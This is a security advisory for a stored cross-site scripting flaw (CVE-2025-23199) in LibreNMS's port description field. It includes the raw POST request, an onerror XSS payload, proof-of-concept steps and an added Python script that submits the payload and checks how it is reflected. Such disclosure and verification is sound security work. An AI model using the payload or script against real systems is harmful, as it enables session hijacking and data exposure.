CVE-2025-23199: LibreNMS Ports Stored Cross-site Scripting vulnerability
StoredXSS-LibreNMS-Ports
Description:
Stored cross-site scripting in the "descr" parameter of /ajax_form.php (request type update-ifalias) in LibreNMS version 24.10.1 (https://github.com/librenms/librenms). A remote attacker with an authenticated LibreNMS session (the request carries the session cookie and CSRF token) can store a script in a port description. When a user views or interacts with the page that renders the description, the script executes in that user's browser, which can lead to unauthorized actions in the user's session or data exposure.
Endpoint: /ajax_form.php
Parameter: descr
Request:
POST /ajax_form.php HTTP/1.1
Host: <your_host>
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: <your_XSRF_token>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: <your_cookie>
type=update-ifalias&descr=%22%3E%3Cimg+src+onerror%3D%22alert(1)%22%3E&ifName=lo&port_id=1&device_id=1
Proof of Concept:
- Add a new device through the LibreNMS interface.
- Edit the newly created device and open the "Ports" section.
- In the "Description" field of a port, enter the following payload:
  "><img src onerror="alert(1)">
- Save the changes.
- The script executes when the device's "Ports" tab is opened, and again when hovering over the modified value in the "Port" field.
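The request and the check described above, written out as an added Python script. This is example code for this advisory, not LibreNMS code and not part of the original report. It builds the same update-ifalias body the advisory shows, sends it to a test instance, fetches the ports tab and classifies whether the stored description comes back raw (exploitable) or HTML-escaped. Two things are assumptions rather than statements from the advisory: that the ports tab is served at /device/<device_id>/ports, and that a fixed build reflects the value HTML-escaped in the way htmlspecialchars would. The sample HTML used for the offline run is constructed, not captured from a real instance.

```python
"""Reproduce the update-ifalias request and check how the description is reflected.

Added example for this advisory; not LibreNMS code. Assumptions (not from the
advisory): the ports tab is served at /device/<device_id>/ports, and a fixed
build reflects the description HTML-escaped (htmlspecialchars-style).
"""
import html
import urllib.parse
import urllib.request

# The payload from the advisory.
PAYLOAD = '"><img src onerror="alert(1)">'


def build_update_ifalias_body(port_id, device_id, ifname, descr):
    """Form-encode the body sent to /ajax_form.php, as in the advisory's request."""
    return urllib.parse.urlencode({
        "type": "update-ifalias",
        "descr": descr,
        "ifName": ifname,
        "port_id": port_id,
        "device_id": device_id,
    })


def decode_body(body):
    """Parse a form-encoded body back into single-valued fields (for checking)."""
    return {k: v[0] for k, v in urllib.parse.parse_qs(body).items()}


def classify_reflection(page_html, descr):
    """Return 'raw' (descr concatenated unescaped, exploitable), 'escaped'
    (htmlspecialchars-style, harmless) or 'absent'.

    Raw is checked first: a page that escapes the value in one place but
    concatenates it raw elsewhere (e.g. into a title attribute) is still
    vulnerable. A descr without HTML metacharacters looks identical either
    way, so only test with a payload containing < > " or &.
    """
    if descr in page_html:
        return "raw"
    if html.escape(descr, quote=True) in page_html:
        return "escaped"
    return "absent"


def submit_description(base_url, cookie, csrf_token, port_id, device_id, ifname, descr):
    """Send the advisory's POST to a test instance. Needs a logged-in session."""
    body = build_update_ifalias_body(port_id, device_id, ifname, descr).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + "/ajax_form.php",
        data=body,
        method="POST",
        headers={
            "X-Requested-With": "XMLHttpRequest",
            "X-CSRF-TOKEN": csrf_token,
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "Cookie": cookie,
        },
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status, resp.read().decode("utf-8", errors="replace")


def fetch_ports_tab(base_url, cookie, device_id):
    """Fetch the device's ports tab (the path is an assumption, see module docstring)."""
    req = urllib.request.Request(
        f"{base_url.rstrip('/')}/device/{device_id}/ports",
        headers={"Cookie": cookie},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Constructed sample responses (not captured from a real instance): the same
# table cell with the description concatenated raw, and HTML-escaped.
VULNERABLE_PORTS_HTML = (
    '<td><a href="/device/1/port/1" title="lo - ' + PAYLOAD + '">lo</a></td>'
)
FIXED_PORTS_HTML = (
    '<td><a href="/device/1/port/1" title="lo - '
    + html.escape(PAYLOAD, quote=True) + '">lo</a></td>'
)


def verify_live(base_url, cookie, csrf_token, port_id=1, device_id=1, ifname="lo"):
    """Full check against a test instance you are authorised to test."""
    submit_description(base_url, cookie, csrf_token, port_id, device_id, ifname, PAYLOAD)
    return classify_reflection(fetch_ports_tab(base_url, cookie, device_id), PAYLOAD)


if __name__ == "__main__":
    # Offline run over the constructed samples; call verify_live() for a real test.
    print(build_update_ifalias_body(1, 1, "lo", PAYLOAD))
    print("vulnerable sample:", classify_reflection(VULNERABLE_PORTS_HTML, PAYLOAD))
    print("fixed sample:     ", classify_reflection(FIXED_PORTS_HTML, PAYLOAD))
```

Run it without arguments to see the encoded body and the two classifications; wire verify_live() to a session cookie and CSRF token from a test instance to reproduce the advisory end to end. The classifier deliberately reports "raw" even when an escaped copy is also present, because the hover trigger in the PoC shows the same value being rendered in more than one place.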